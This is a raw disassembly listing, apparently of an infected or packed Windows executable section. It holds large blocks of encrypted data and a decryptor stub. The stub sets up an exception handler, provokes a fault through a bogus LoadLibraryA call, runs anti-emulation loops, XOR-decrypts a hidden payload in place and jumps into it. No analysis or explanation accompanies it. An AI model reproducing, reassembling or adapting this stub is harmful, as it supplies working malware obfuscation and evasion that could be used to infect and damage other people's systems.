		dd 9428CC70h, 81ED8DE0h, 0E7B0CA75h, 50DD1638h,	22E8BA08h
		dd 1E98CF0Bh, 1B50D139h, 11CFDCB6h, 49E747Bh, 7438BC60h
		dd 933933A5h, 0EC9E87ABh, 616214B9h, 34EE44A4h,	0AE4B0850h
		dd 2280D8A5h, 0AD83AA70h, 0C2A7A45Dh, 0EEC92650h, 0E2478465h
		dd 0F443EA30h, 37DDFEF8h, 8EC85A28h, 0ACB35977h, 4AB4CC6h
		dd 566CBD60h, 0DC03A927h, 54F89C76h, 0D21D08B0h, 0C53F9D7h
		dd 0A448ECA6h, 11CD5F00h, 7BD24898h, 0E33D41Fh,	0E1FF53AFh
		dd 0D44E244Bh, 4CE88C30h, 7DE8FFD4h, 0AF4D9BBAh, 9438EAB8h
		dd 70284CF0h, 5E1F0C40h, 0D2B0AF55h, 4E185D40h,	0E06085BDh
		dd 0B77D7E20h, 6448DAA8h, 0D0385FE4h, 0E5986774h, 0B205A4Ah
		dd 0E7ADA6B0h, 0B2782AF8h, 0CF6D7B9Bh, 9458CA98h, 50C86C10h
		dd 1FBD2BD3h, 4A87AC8h,	38BC60h, 0E74FDBDDh, 20F89C40h
		dd 6EF8BCB5h, 0F3538FCBh, 9BD8611Bh, 0D5935C36h, 34D48DF9h
		dd 771D36B8h, 0CE089A68h, 0ECF39937h, 44E88C06h, 0B82CFCE0h
		dd 0E798D476h, 0ACBB598Ah, 0E434CC6h, 94E70406h, 0DC0B89DAh
		dd 0FF9E9C76h, 0FCE38947h, 34DB7C16h, 0D73CED90h, 2C33D9F7h
		dd 8428CC46h, 0F9EC1CE0h, 640B6BA7h, 0D10C1CC0h, 0AF421C80h
		dd 3F977753h, 12F7C495h, 1DF0F780h, 0CD9BB0B8h,	4C933997h
		dd 0E4882CE6h, 5A8D9CC0h, 0FCEB893Dh, 3C527C16h, 0A7B16CD0h
		dd 1035A473h, 940C88BDh, 0FC78FDE0h, 87A327E0h,	0E5C07AC6h
		dd 2243EAF0h, 0DCD87318h, 24C86CA8h, 3F5E3D82h,	0CD2DE7A8h
		dd 0CC7EBA15h, 4FEEECE1h, 0D9525FF0h, 0F2509435h, 0BF5D8B20h
		dd 0A448DAA8h, 61A85C00h, 7C039B76h, 7F81D7B8h,	9C238403h
		dd 59F3CCEBh, 44DEB380h, 8BC869A1h, 1DC96C26h, 901C980Bh
		dd 14C0F179h, 0C993BC56h, 0E4BE1344h, 6B68196Bh, 419F0C86h
		dd 34EE44ABh, 0A448ECD0h, 0CC4F5E74h, 842C0EDBh, 491B6BB6h
		dd 643E9398h, 0DFC13C0h, 0ACE88C31h, 0B458FCADh, 6A9A295Bh
		dd 0A60B90C5h, 48E408DEh, 0E8D4360h, 6D881AEBh,	62C740C5h
		dd 9CE35FB0h, 0CB007F1Ch, 0E7C3C4E3h, 0E158B434h, 11A3338Fh
		dd 0F4AE035Ch, 684AAF0Bh, 0EB989949h, 6EB8C06h,	50DD75A8h
		dd 0AFC85A2Fh, 27C7F4F3h, 4A84C70h, 8BED0588h, 5835A72Fh
		dd 2F8AA7Fh, 3B9DA158h,	884DF7DFh, 2F48DAAFh, 5EBB544Ah
		dd 7E6E77Ch, 7C973909h,	6408AD30h, 0D52298CFh, 0F1EB8C30h
		dd 0B46EC360h, 1B48D913h, 0A894DCB6h, 0A62D4318h, 0F918BC60h
		dd 61A32896h, 54CEA3C0h, 2C380AB3h, 0CB27894Ah,	9BF45113h
		dd 61B85C36h, 886FF77Bh, 0F583BFEFh, 68E3AC50h,	0EBC489F9h
		dd 0C1E78C06h, 0B458FDADh, 1B48E913h, 155EDCB6h, 0B8DB3C8h
		dd 741840E5h, 0E6C8A7D0h, 4CCDF6Bh, 3B9D2158h, 886545DFh
		dd 0AB48DAAFh, 14B8B885h, 44ADCF70h, 0F7980ADFh, 52372CD5h
		dd 0FF7897C0h, 0C6E78077h, 0B458FC6Dh, 2BC02B2Bh, 94381803h
		dd 668CFF0h, 770CFB63h,	0D2B7AC55h, 0ABA8CE40h,	0F257D005h
		dd 0E4D8320h, 0FE48DAABh, 91B79C85h, 8428CCC7h,	0F498A009h
		dd 6BF79050h, 0D4788845h, 51D60C30h, 0B4D379AFh, 62436C10h
		dd 0A07BF781h, 0F014A4A0h, 0C921439Fh, 0E4BE136Ch, 0D1FBEB35h
		dd 0C45E3370h, 0B58F923h, 21C1ECA6h, 148E63E8h,	113CCFBh
		dd 0F4AE0300h, 0E133A422h, 0D44E2324h, 44D5E542h, 0C628FCA0h
		dd 24D78427h, 0DAB5DC80h, 2F69C70Ch, 645ABF62h,	0DB60A9EBh
		dd 588D9C76h, 3B78C833h, 109CF311h, 0BFA38D8Ch,	0B43DD3C3h
		dd 0E428FA4Fh, 0CB18896Bh, 3EE0AC66h, 0B587E335h, 44E88C99h
		dd 9F568920h, 2DBA6057h, 9B309BBBh, 0FB577072h,	0F117F59Fh
		dd 1B77D262h, 0D5DCA0CBh, 0C4408717h, 0CB278320h, 250A07EFh
		dd 14D8784Ah, 0B7662C70h, 0D094B720h, 5BC029D7h, 51F11CF6h
		dd 44DEB3F4h, 9CD7452Dh, 0A1CB6C10h, 940EE300h,	4A0DE996h
		dd 361B7A4Bh, 0E8CA07C4h, 0BC03DA86h, 0C43B8D77h, 34DD7C20h
		dd 0E2C1EC90h, 0D7E603FCh, 2BD3327h, 35980ADBh,	0E107B3B8h
		dd 0D4781DDAh, 6C82D860h, 21A703CAh, 24FE57F6h,	9B671C05h
		dd 4A94978h, 91425460h,	0F560D32Fh, 7F89C40h, 0AD2E78D5h
		dd 518B194Ch, 0CD3A99F3h, 14F92574h, 0BB7C798Fh, 61673CD6h
		dd 643E976Ah, 0EB249949h, 5D008C06h, 0E758FCA0h, 4FA93875h
		dd 0FA4F93E5h, 6CDB3E95h, 648CC09h, 88E15AB9h, 549DFB25h
		dd 2D43E4E7h, 273083DFh, 0F748EC90h, 67DD0E65h,	0E15AA304h
		dd 82F14EB0h, 36DC039h,	3C2F1CA5h, 0BB17653Dh, 0B458EE48h
		dd 66AD3F10h, 0E153BFE1h, 6DDA1C80h, 1174D516h,	0B38849B7h
		dd 0AB106CA8h, 0C470E44Fh, 518B7C20h, 0CA2984D3h, 7BF63967h
		dd 0FD4EA504h, 82F14EB0h, 36DC039h, 3C2F1CA5h, 0BB1764FDh
		dd 31D5A8F0h, 24FE5688h, 0FE68B8EAh, 91571BF1h,	742E8792h
		dd 1BAC1059h, 62C3B2D5h, 49A826B0h, 2E62C9Dh, 0F418BC90h
		dd 2E20E9FFh, 8540CC46h, 0A09838E0h, 9B5FAD3Ah,	0E2474055h
		dd 4082D830h, 0E8CD03F7h, 0A7C85A2Fh, 21C7C844h, 49E73A4h
		dd 4F72299Fh, 27D72CE6h, 6AA829CDh, 3B3E0C86h, 2E312B5h
		dd 5BB06F90h, 1403D80Fh, 1A1CC70h, 0F4AE0380h, 9B5EAC3Ah
		dd 0E243B655h, 4B280930h, 0B4585824h, 74084710h, 0C43BB6D0h
		dd 4C04D9Ah, 22D8BC60h,	0DFC2B92Fh, 0AC7B9C76h,	2CEC034Fh
		dd 0BDD87C25h, 92778815h, 7C35D100h, 928FA4Fh, 0C2A74C75h
		dd 0E5AFD50h, 41874CC0h, 44DEB746h, 0BBA70423h,	24CDDA94h
		dd 6B38B680h, 32972845h, 68D4360h, 67881AEBh, 0D0F763B8h
		dd 0C468092Fh, 0BA0F9A9h, 6D7BECA6h, 44E99F03h,	0D52CA621h
		dd 0CBFC891Fh, 0F1F7AC66h, 0D44E278Eh, 0C0E74CB5h, 0B458F9DBh
		dd 0A141A523h, 940EE3FCh, 6CF91DA1h, 7417BC7Fh,	721DD380h
		dd 0D1F8AA7Bh, 0F0EC0370h, 0BDD87C25h, 92776C15h, 0FB009F00h
		dd 0F28CC1Fh, 716F04ABh
		dd 643E94DBh, 0C4781CC0h, 0C1EB8A45h, 0B46EECC8h, 0E5CBBE23h
		dd 75CF2D77h, 3B24C979h, 0E3A0BC56h, 6F882CF8h,	0D1FBA00Bh
		dd 0C45E1CD8h, 0F5DBAE13h, 45BF1D67h, 2B3CD989h, 8BEBCC46h
		dd 0D9E7757h, 378599B3h, 97CF13D8h, 0D388F24h, 0B7703DCBh
		dd 7BF2EDC0h, 6D56B5F7h, 7E2B5184h, 946ABD6Ch, 6FB4675Bh
		dd 16FB8802h, 8C2C81A0h, 17018BDFh, 0DCCDD751h,	0D7B86A3Fh
		dd 940C98FBh, 7617FCD3h, 6408ACE8h, 3FB79703h, 1455013Bh
		dd 4858CA9Eh, 0EDFBB39Bh, 0E659E02Ch, 73D270F6h, 0DE389062h
		dd 8FC70ECh, 898CB27Ch,	2C1D0C8Ch, 3553B5C3h, 0E110A9ADh
		dd 29B32800h, 847A8F23h, 0BABB9EFh, 678353AFh, 9A314BFDh
		dd 626C8373h, 89A7035Fh, 6A9D2F47h, 6B23588Fh, 5395B30Fh
		dd 7B2A8F23h, 1B773C54h, 7A8A1BFh, 406743E4h, 0CB278325h
		dd 89A037A3h, 6147A3FEh, 78D22460h, 0D570C31Fh,	6BF753AEh
		dd 2B86F044h, 0AC3ABFCFh, 0B458FCB6h, 0DB370FF8h, 9438347Fh
		dd 85F54CF0h, 422B858Dh, 0E753C5D0h, 0AB9C9C40h, 44DD8782h
		dd 50D84A1Fh, 252ECE19h, 1BE2113Eh, 842B08F5h, 0C8C6B7E0h
		dd 0E56E7253h, 0DB3D4CFBh, 44EB38B5h, 0A21B0BA0h, 24C84C10h
		dd 979F598Fh, 475E4CF0h, 0F017BE3Ch, 0E4882F4Dh, 69F0DFCBh
		dd 64C8AC10h, 3757F82Fh, 8475EC90h, 1B987C20h, 842B48F4h
		dd 0A21D4E0h, 0E60753AFh, 0D4781FB9h, 7B2C29B3h, 3F58FC96h
		dd 6E436452h, 0E7F9F790h, 0EF687FF4h, 0FDD0BF65h, 61013C9Ah
		dd 54CEA3C8h, 7C6446B3h, 34D97C20h, 43E204C1h, 8188A3FFh
		dd 841EF4F9h, 41A81C51h, 643E94DAh, 1D863CAAh, 0ACFCF468h
		dd 4BA71B30h, 0B0C7BE95h, 0A5DA0F42h, 3290C765h, 83FD5760h
		dd 0D2B0A755h, 54F89C40h, 334A78B1h, 2E0F7A5h, 0A448EF90h
		dd 95B42900h, 0B21047D5h, 0B67C3E0h, 0E50247ABh, 0E240974Dh
		dd 44E88C30h, 0B45E94A8h, 4C916C10h, 9438DC86h,	0E3EAA4A8h
		dd 0F192439Fh, 0E4BE1453h, 0D7D218C6h, 4C683A88h, 2E0FFA5h
		dd 53A80E90h, 2280D785h, 8428C470h, 749149E0h, 523029EDh
		dd 110C1DC0h, 7C6309C7h, 0B458FC96h, 3FBC6410h,	0ACBB6100h
		dd 70AD4CC6h, 0F0A53CD0h, 0E1881AE8h, 0E9783B34h, 0C45E3435h
		dd 0C3460825h, 92706715h, 14B85C00h, 421B8F0h, 0C2A0BF5Dh
		dd 0ED7FAE50h, 0EBB0B943h, 0ACE88C06h, 4BA70FA7h, 0DB350DF8h
		dd 9648347Fh, 99234CF0h, 742E83E4h, 0DB00B1D3h,	2D109C76h
		dd 0CB97F34Ch, 34DA2CA4h, 24FD6790h, 9FB86A3Fh,	5A2BF02Eh
		dd 0B654608h, 5E8AA3AFh, 55781CC2h, 4488A87Ah, 4AD31CA0h
		dd 5ECB3A42h, 8442DF94h, 3C23C907h, 7418BC56h, 0F0FD3CD0h
		dd 6B3421C9h, 71E50C86h, 34EE44B8h, 0B420611Bh,	0B04B5C36h
		dd 8E0E7527h, 41153CE0h, 643EBC50h, 0D4C9B933h,	0E01B8ED3h
		dd 8CD37957h, 24C86C26h, 1037CC80h, 4A84C5Eh, 9C30CF9Fh
		dd 1B77C266h, 6B4409CBh, 16ED0C86h, 3440F82Fh, 11C3EC90h
		dd 148E6380h, 53886FBh,	0F4F818AAh, 2E234C50h, 0E77A6FC8h
		dd 509A8FF9h, 0A430719Bh, 0A9436C26h, 940ECCE8h, 38231A82h
		dd 1CBD3F44h, 0E4881AC0h, 54903BC3h, 4F680CB0h,	7ED9745Ah
		dd 23BFEF98h, 803DD7F7h, 7328FA4Fh, 0C2A0B765h,	6408EC50h
		dd 237A68C0h, 489A8F28h, 1D1CC89h, 24FE53D8h, 9510AF0Bh
		dd 8F2DBBC0h, 34188A58h, 90882CD0h, 5E06B42h, 3B944558h
		dd 383325DFh, 8F609F93h, 42E95072h, 0DD776883h,	0CC00896Dh
		dd 0D981AC66h, 0D44E230Ch, 1AB728C3h, 39CACDAFh, 24C8B897h
		dd 1DADE680h, 71A87AC8h, 0CCAD566h, 6C9A1886h, 0EF106C10h
		dd 9E97F36Ah, 37D436ABh, 21BFFCDAh, 148E648Bh, 9428CC70h
		dd 819D7D6Dh, 0AC852543h, 0D7782AFFh, 72F8E4B5h, 0DCFF7FA0h
		dd 24C86C10h, 1D109FABh, 4A81F77h, 3C9D4B60h, 0E5881AECh
		dd 20F89C40h, 0CC2BCBB7h, 9478DC80h, 9CC36967h,	14B85C36h
		dd 835C4C70h, 3E2D4B2h,	0EF5253AFh, 0E247D44Dh,	0CDED6F30h
		dd 0B9B3D4EBh, 1B0CE19Bh, 96DBDCB6h, 4F234F1Bh,	0FF9D4B48h
		dd 0E7881AE8h, 20F89C40h, 8ED87A4h, 37D84A1Fh, 9277541Dh
		dd 0A03D5F00h, 8528FA4Fh, 0E4D2B7E8h, 5B8C29DBh, 9E411CF6h
		dd 0CDEBFF38h, 0F659F4EAh, 7CABEF00h, 18BD5780h, 6CA87ACFh
		dd 741894F8h, 0BD806ED1h, 0DEA8DF41h, 0F2508525h, 0BF5D8B20h
		dd 0A448DAA8h, 60A85C00h, 0ECA5CF76h, 42980AF0h, 0EF8D5B50h
		dd 0D4782AF8h, 31E88E30h, 439E02B4h, 12F0E795h,	9038DC80h
		dd 8EAE39F0h, 422036D5h, 6F0DDBD0h, 54F8AA78h, 0B1680CF0h
		dd 36DFF62Bh, 724A4652h, 1D53ABE2h, 461ACBFAh, 164E3E4Ah
		dd 0DA9FA7h, 5B1C3E4Bh,	0F96BD432h, 0B46EC3C4h,	0FA4C6310h
		dd 6BC7237Ah, 3297CC45h, 0CE8D4360h, 1B881AEBh,	62C7E0F5h
		dd 0EAFDF3B0h, 0B9D84A1Bh, 9277841Dh, 642DD100h, 0D528FA4Fh
		dd 0B9856B2h, 5237C8E5h, 7AEDE3C0h, 0BBE8BA0Bh,	82679815h
		dd 0A5D9310h, 1938EABBh, 32961C45h, 14AD4360h, 0B2881AEFh
		dd 6F5209BFh, 61EB0C86h, 34EE4344h, 0A4A02F90h,	49B85C00h
		dd 69A9CD1Ah, 0F4AE0B76h, 0A5075C08h, 0E26D6845h, 87280930h
		dd 44A73423h, 504DAD1Fh, 5738EA95h, 2EA85CCDh, 1204C960h
		dd 0E8AC5051h, 478DED2Ch, 3BACE4D0h, 31AD83DFh,	5BB23878h
		dd 0EB6AB4FFh, 0AA49338Fh, 0A2E0111Fh, 41B0BE64h, 0B4781CC0h
		dd 0BB1729D8h, 3F61895Fh, 0A9F84854h, 0A2068C35h, 0CF8C7F0h
		dd 72223D06h, 0B2AD5FD2h, 0ABF89C28h, 0AEAC87B0h, 0CB882E20h
		dd 92731605h, 1C7CDF00h, 0BB74F2F1h, 0F7ED60DFh, 8C0C6AD3h
		dd 2B87E641h, 0BB17F3D8h, 0C9B9D5Fh, 24C86C64h,	0BB806D6Bh
		dd 0ECA84CF0h, 7418BC7Dh, 5C880C12h, 54F89C70h,	0C4681C58h
		dd 34FCBE20h, 0A4496928h, 14BBB400h, 0A8EACC70h, 0D0CCB1E0h
		dd 0E726615Ch, 0CD041C38h, 44E86450h, 0E0D3FCA0h, 0AF955C34h
		dd 0F9D55D9Ah, 0ECA87AC8h, 8BE75DB4h, 0E48CEEB1h, 52FF9F42h
		dd 0D3DC09B1h, 0CE337BBEh, 808C15FFh, 498D3142h, 1CEh dup(0)
		dd 0FDF00000h, 0F5180B7Fh, 0F52E0F77h, 77h, 13DEh dup(0)
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_31442001	proc near		; CODE XREF: .gda_:31432052p
		pusha
		push	ebp
		mov	ebp, esp
		call	loc_31442014
		call	sub_314420A0
		jmp	near ptr byte_31442049
sub_31442001	endp

; ---------------------------------------------------------------------------


loc_31442014:				; CODE XREF: sub_31442001+4p
		push	dword ptr fs:0
		mov	fs:0, esp
		mov	ds:dword_3144204A, ebp
		xor	ebx, ebx
		push	800h
		push	ebx
		push	4000h
		push	ebx
		push	1000h
		push	ebx
		push	80000000h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	ds:dword_3142808C	; LoadLibraryA
; ---------------------------------------------------------------------------
byte_31442049	db 0BDh			; CODE XREF: sub_31442001+Ej
dword_3144204A	dd 4DED00F6h		; DATA XREF: .gda_:31442020w
; ---------------------------------------------------------------------------
		mov	ecx, [ebp-8]
		mov	fs:0, ecx
		cld
		cld
		cld
		sub	eax, eax


loc_3144205C:				; CODE XREF: .gda_:31442062j
		dec	al
		or	al, al
		jz	short loc_31442066
		jnz	short loc_3144205C
		jmp	short loc_314420CD
; ---------------------------------------------------------------------------


loc_31442066:				; CODE XREF: .gda_:31442060j
		call	sub_3144209D
		add	edx, 42h
		sub	esi, esi
		xor	esi, 2898h
		cld
		cld
		mov	ecx, 22h
		cld
		stc
		push	edx


loc_31442083:				; CODE XREF: .gda_:31442092j
		xchg	al, [edx]
		xor	ax, cx
		xchg	al, [edx]
		add	edx, 1
		sub	esi, 1
		or	esi, esi
		jnz	short loc_31442083
		pop	edx
		leave
		mov	[esp+14h], edx
		popa
		jmp	edx

; =============== S U B	R O U T	I N E =======================================



sub_3144209D	proc near		; CODE XREF: .gda_:loc_31442066p
		pop	edx
		jmp	edx
sub_3144209D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_314420A0	proc near		; CODE XREF: sub_31442001+9p

arg_C		= dword	ptr  10h

		mov	edx, [esp+arg_C]
		xor	eax, eax
		pop	dword ptr [edx+0B8h]
		retn
sub_314420A0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		retf	2222h
; ---------------------------------------------------------------------------
		dd 26A92222h, 0BAABDE06h, 22220DE9h, 0AA4A2D5h,	22222222h
		dd 7EA9A222h, 0F562606h
		db 7Bh
; ---------------------------------------------------------------------------


loc_314420CD:				; CODE XREF: .gda_:31442064j
		stosd
		xchg	eax, edx
		in	eax, dx
		or	eax, 0AD752222h
		mov	ds:22220DF1h, al
		mov	ds:220AA89Ah, al
		and	cl, dl
		push	edi
		das
		and	[edx+22220AA9h], edi
		test	eax, 11DD2079h
		leave
		sub	ch, [ecx+220AAEBAh]
		and	bl, ch
		adc	[ecx+77h], edi
		test	eax, 64EA3CAh
		db	26h
		daa
		and	ah, [edx]
		and	ah, [ebx+143227CFh]
		and	ch, [ecx-50D9F9A2h]
		xchg	eax, edi
		mov	edx, 9B22141Ah
		and	ah, [edx]
		and	ah, [edx]
		rol	dword ptr [esi+22226CCAh], 1
		and	ch, [ecx+2265CAEAh]
		and	ah, [edx]
		or	ebx, esp
		push	esi
		xor	eax, 2223221Fh
		and	dl, [ebp+32h]
		scasd
		cmpsd
		div	byte ptr [edx]
		adc	al, 22h
		test	al, 72h
		ror	dl, cl
		adc	[edx], ah
		and	ah, [edx]
		leave
		sbb	eax, 1AA9A7D5h
		adc	al, 22h
		and	ah, [edx]
		and	ah, [edx-6850C3AAh]
		lodsd
		sbb	dl, [edx]
		test	eax, 8626065Eh
		xchg	ebp, [ecx+141DF697h]
		and	ch, [ecx+141DFA9Fh]
		and	ch, [ecx+141DF2BFh]
		and	bh, [edi-1Fh]
		sub	eax, 0A8CCE113h
		rcr	byte ptr [ebx+22220595h], 1
		adc	dh, [edx]
		bound	esp, [eax]
		hlt
; ---------------------------------------------------------------------------
		dw 0DBC0h
		dd 0E81D4DE1h, 21497B6Ah, 703A3229h, 0D8524763h, 899E0743h
		dd 0AF23A4BAh, 7B0DDFF9h, 0C847B216h, 44CBC9B2h, 630E14D1h
		dd 0F85CB7C1h, 93FEBE41h, 4BF3FD71h, 789702B9h,	8D9EA830h
		dd 0B5FE15E3h, 0C3F2FCDh, 0CAD4016Eh, 0B12DA18Bh, 222D9086h
		dd 0FB1D3566h, 8ED29335h, 0BB92E679h, 0F772DF51h, 24D6FF61h
		dd 0A3F6C4DAh, 3DDDD3FEh, 74081502h, 9BDE496Eh,	51F3205h
		dd 7878679Ch, 30061982h, 8D8C8F22h, 0E5D3F0FBh,	6C001924h
		dd 2F75344Bh, 0BA1B6514h, 0A8569281h, 380E1C7Fh, 0BCB2B16Dh
		dd 0EDCAFF83h, 12193628h, 0ED16F12h, 0ABD07143h, 8BB6ACB4h
		dd 85166479h, 0FB4AD3F2h, 0E0796B15h, 5348D95Dh, 0E0B3042Ch
		dd 9B6F79DDh, 0ED26B48Ah, 828796Fh, 3FC2513Bh, 8EB14C47h
		dd 5DCBAAAAh, 0A73E3A77h, 0D6E3405Fh, 0DBA95792h, 2673F0EFh
		dd 6D5D2C02h, 80A0F18Eh, 0EBDFB2h, 3006227Fh, 0FD8269A1h
		dd 0F7B684ACh, 0ABCF994h, 5927343Ch, 0BEA5D677h, 0B0E329BAh
		dd 0B0E2A67h, 0B67B59E3h, 19BEBAD9h, 63FDAC7Ah,	27713C12h
		dd 0A6DD725Fh, 57B66D82h, 0C2E075h, 0BF45DC32h,	0B3C6FEFEh
		dd 787E2461h, 0A5BF0C1Ah, 98D8C7ECh, 50C944E2h,	0F71E0642h
		dd 0F6ED9AAFh, 0B74E19F2h, 7044BA2Eh, 9DB39B62h, 0E0C0D4DAh
		dd 0A4175319h, 91667441h, 0FECE2CEFh, 0D20369FAh, 8B4E6AA0h
		dd 0B3E4EBCFh, 1475ECCEh, 60858CF0h, 21FBF10Bh,	23260211h
		dd 1626769h, 7A8B4EDh, 3B664B6Eh, 0FC6D52Ah, 9E85B277h
		dd 40B2C75Ah, 5C21FC97h, 90E6F655h, 225EC615h, 4160C7Bh
		dd 0F8A65C32h, 4F8695EAh, 5E457237h, 2FF6811Ah,	98EC7E56h
		dd 0A6DE8Ah, 0C1E6C2Ah,	1D64E3Ah, 0D2D9901Ah, 712E04ABh
		dd 0D73E0D62h, 0D6CDFA4Fh, 58A4D492h, 8599744Bh, 0C8E8173Ch
		dd 8096E112h, 7A1FB5B2h, 306C146Ah, 82F42F7Bh, 12237B90h
		dd 0F36E4A69h, 6DA5F7FBh, 88A8D79Ch, 74D2ABBAh,	0D00E1C70h
		dd 0F0C6D42Ch, 0E4FAD8ACh, 0F5894416h, 0D8180768h, 872C4147h
		dd 816DACB4h, 3BD0D9F7h, 0F67FDC04h, 0B2F57C79h, 0D5FD4CA2h
		dd 20003FE0h, 986AF3D2h, 0DBA6B488h, 3E25A6C7h,	0C1A6DB3Ah
		dd 8F6C197Dh, 0F5CD549Ch, 28083780h, 6FF7B425h,	6E969317h
		dd 0DEE3FF4Ah, 37DE1A39h, 519E58Ah, 78786484h, 0BD499E1h
		dd 0F21DCC14h, 2FB7F565h, 2E563FD7h, 0AABBF0Ah,	6B9EDAF9h
		dd 41275BB3h, 5E99FDh, 482ED41Ch, 25BE8CE3h, 564A14E7h
		dd 0B2E1B712h, 6F3F02CAh, 0A9DDA8F2h, 3560E79h,	0F8A48BCBh
		dd 50B8C80h, 68485975h,	20361DA3h, 0D5EA71D2h, 0AF594B74h
		dd 0C93C724h, 0C0D62477h, 3525FAF2h, 42ED50EDh,	0D4AB8186h
		dd 4CF6F2E0h, 3EAC35F4h, 12A4F7E1h, 1C55D9E0h, 70FEE490h
		dd 0F34E5CDDh, 0BB067EA6h, 80FEA6E6h, 0A8B6849Ah, 4A3F3C38h
		dd 2F763A60h, 0BEA53A57h, 84D5FCBAh, 57FE7432h,	244DD42Ah
		dd 64358C88h, 601C0430h, 0B27C3E78h, 0FF169CCAh, 4834AC82h
		dd 50E90E2Bh, 0C31049CDh, 0E9D994DCh, 0EC71B327h, 2036051Dh
		dd 88EE495Fh, 0AC1FB4BCh, 831E6C49h, 4173D7D5h,	8E9E9C1Fh
		dd 48C3D9AAh, 0D73E3A76h, 8AA2943Ah, 0A751D6B2h, 265D92DFh
		dd 971EA902h, 0CD7ED08Fh, 904E5CB3h, 3006147Bh,	8DBAA971h
		dd 0F0D1F1F8h, 71181520h, 0B5415166h, 0C676BBC2h, 0BF56A4BFh
		dd 0E3148C7h, 9A532B2Ah, 0FFBEBAD9h, 5B58D1A5h,	0D8443C24h
		dd 519F6A0h, 486897DCh,	174CC3h, 19E54B32h, 0E4A29863h
		dd 0CAEBB3F5h, 13363221h, 0A64B7F24h, 50A682B6h, 9DE13B16h
		dd 0C0E01F9Ch, 0DEFA5C77h, 74B8D7ECh, 5CC1E210h, 0E09CCCFEh
		dd 0CD5196F8h, 10504FD4h, 14AAEC87h, 85100C69h,	0B17D5CB2h
		dd 93CF7FBh, 0DEC2F2A7h, 2184F19Ah, 7B4A582Eh, 0A4554679h
		dd 1C5F6DEAh, 1056A4B4h, 69584C26h, 0F95847Ah, 9E85DA77h
		dd 39B6C15Ah, 0ACD13366h, 1569FCEEh, 486890BCh,	0FFEBA192h
		dd 6D318FCDh, 0B0B0AFC4h, 0ACFFC249h, 20360532h, 0B67B0385h
		dd 0AFA682B1h, 3E2542D7h, 3BBECD3Ah, 0E28E630Dh, 702C54C0h
		dd 28540C08h, 0E4F6C5B2h, 326A3792h, 1C0C244Ah,	2A21E889h
		dd 0B4C99CACh, 0B17D5CB2h, 0CFF9CE82h, 0AF6B41DDh, 0F2B6B28Fh
		dd 0E73E2D03h, 0E61D069Fh, 0A85A6FC2h, 180EFC79h, 3821EC72h
		dd 0F0C88B2Ah, 0A8BE8DE2h, 6076445Ah, 0D82E3C12h, 90CE7FCAh
		dd 485EAC82h, 5340357Ah, 0C3F449CDh, 0E92D94DCh, 1DBEC80Eh
		dd 0E3D8E6E1h, 819F695Fh, 0AFF4B4BCh, 3E25FED7h, 9453AD3Ah
		dd 508EAACDh, 704654BCh, 4351632Eh, 92A6B4AFh, 34C7CAFBh
		dd 4603132Fh, 0ADAB4063h, 7FC6E4BBh, 4E756627h,	68839D6Ah
		dd 2BFEFA1Dh, 0D3D7C6C6h, 750F3237h, 0B269506Fh, 0FCFD89A8h
		dd 3400F8C9h, 4C6D7921h, 84B5B82Ah, 0C6DBE090h,	504075Ah
		dd 9E4B4873h, 0D18398A3h, 2D2CEF82h, 4673101Bh,	0B5ABB05Bh
		dd 0D9F6E48Bh, 683F2BCCh, 41537659h, 0EABE99A6h, 23C3D7E5h
		dd 4B1E2D31h, 0B4B74148h, 0D5EBCE97h, 242320C5h, 495B7E0Ah
		dd 92B5C4BEh, 3DDADDF7h, 75141C1Eh, 8BDE4863h, 0F4F78188h
		dd 172108D7h, 5C637C06h, 0BBCCFF52h, 0D3C6E5F4h, 181A133Ah
		dd 0A44F4C4Fh, 0EDEC8496h, 656C0DBh, 6C6B701Bh,	0A4A3B943h
		dd 0DBC7DF8Dh, 341B212Eh, 0D84B517Bh, 0F583868Ch, 3A3CC5CEh
		dd 6F161Bh, 0BEBAB975h,	0F1E3F883h, 10C38D6h, 45427178h
		dd 0DFEEBDA1h, 39E0C0EFh, 614D092Eh, 87D64140h,	0D1C8E897h
		dd 191231C6h, 6F3E690Fh, 8FBBB0BFh, 3DC2C9F6h, 74081502h
		dd 0C89F496Eh, 0D4E281BDh, 3E3E31D7h, 7E637803h, 0A99BA143h
		dd 0D4D3C39Ah, 68031906h, 0B852555Ah, 0EDD9EC83h, 3233F2CEh
		dd 56617501h, 84A3932Ah, 0DBCCE9B4h, 25182B33h,	9F2E7D6Ah
		dd 0FFB080AFh, 2D33D9EEh, 6F700A33h, 8CAFB140h,	0F1E8FB83h
		dd 91100A2h, 425F487Eh,	0E19C9DA0h, 31EBB4CBh, 6D773A32h
		dd 86B06B4Dh, 0B8EBF09Bh, 1E2324E5h, 4D526524h,	9086A597h
		dd 19C9D2FBh, 75163B4Ah, 0A7AC7C6Ch, 0F3E58199h, 173C0CB2h
		dd 43757109h, 81B8FE11h, 0A0C2F7E8h, 7B010E02h,	0E355476Fh
		dd 0F0FBA2F0h, 2505A4CEh, 54675A06h, 84B2954Fh,	0DDDCE590h
		dd 2105212Eh, 0AC4B6F12h, 0F58A9D8Ch, 2D33C5D6h, 657A377Ah
		dd 0ABCEAC57h, 0D5F2E793h, 51718CFh, 6659507Fh,	0CC8B90BBh
		dd 50C3D9E3h, 69730217h, 0A5BF724Ah, 0FEE8D385h, 702338C3h
		dd 5C4C6534h, 0A19AA5AFh, 3BC1D0FEh, 7914234Ah,	0A1984976h
		dd 0CE968196h, 122A1DC6h, 6072671Fh, 8188A550h,	0C5D1E1F6h
		dd 73012821h, 9E265A6Fh, 0EDECAFB6h, 633D0DBh, 386B701Bh
		dd 8285A064h, 0CDCAED87h, 319360Ah, 0D85D4F77h,	0E2A58084h
		dd 2D2ACDE7h, 6379162Ah, 0BDBDAF57h, 0C4C89492h, 91B3EE1h
		dd 4565616Eh, 0F78788B1h, 24E8B4E4h, 697B1E01h,	0B383414Eh
		dd 0CADEEE97h, 32337C5h, 5C700C11h, 0B686A597h,	17D9D9FBh
		dd 7303272Ch, 0A6B14576h, 0CFE2AAFAh, 3E2039C2h, 30637803h
		dd 98B1B86Ch, 0D2E6EAFFh, 6B0B1F3Dh, 0BB496079h, 0C69E82A7h
		dd 2526EBCEh, 5B6B4F1Ch, 9EA9BD5Eh, 0F8CAC2E2h,	5022B28h
		dd 0B1784871h, 0F19380B8h, 253BE1EEh, 6F1615h, 8D9FA87Ch
